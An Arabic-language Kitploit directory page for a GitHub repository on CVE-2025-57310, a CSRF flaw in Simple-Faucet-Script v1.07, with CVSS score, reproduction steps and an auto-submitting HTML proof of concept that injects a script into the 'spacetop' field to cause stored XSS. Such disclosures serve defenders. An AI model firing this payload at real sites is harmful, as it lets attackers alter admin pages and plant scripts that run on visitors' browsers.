Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-57310 — ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script v1.07 عبر طلب POST مُعدّ خصيصاً إلى admin.php?p=ads&c=1 مما يسمح للمهاجمين بتنفيذ كود عشوائي. | Kitploit
أدوات/GitHubGitHub/mmakingdom/cve-2025-57310
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script v1.07 عبر طلب POST مُعدّ خصيصاً إلى admin.php?p=ads&c=1 مما يسمح للمهاجمين بتنفيذ كود عشوائي.

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-57310

ثغرة أمنية من نوع تزوير الطلب عبر المواقع (CSRF) في Salmen2/Simple-Faucet-Script الإصدار 1.07 عبر طلب POST مٌصمم إلى admin.php?p=ads&c=1، مما يسمح للمهاجمين بتنفيذ كود تعسفي.

CWE

CWE-352: تزوير الطلب عبر المواقع (CSRF)

CVSS v3.1 النتيجة الأساسية: 8.8 (عالي)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

ملخص

المنتج عرضة لهجوم تزوير الطلب عبر المواقع (CSRF) على لوحة الإدارة. عندما يزور مسؤول موثوق صفحة ضارة تحتوي على كود الإثبات (PoC)، يتسبب هجوم CSRF في تعديل غير مصرح به لمحتوى الصفحة الرئيسية.

خطوات الإعادة

  1. تسجيل الدخول كمسؤول على https://example.com/admin.php
  2. فتح كود الإثبات (PoC) التالي، لاحظ ظهور نافذة تنبيه على الصفحة الرئيسية (Stored XSS).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

التأثير

يمكن للمهاجم حقن HTML/JavaScript تعسفي في الصفحة الرئيسية عبر المعامل spacetop، مما يؤدي إلى ثغرة تخزينية للبرمجة النصية عبر المواقع (Stored XSS).

الإسناد

منتظر محمد أحمد (almuntadhar0x01)

تنزيل الأداة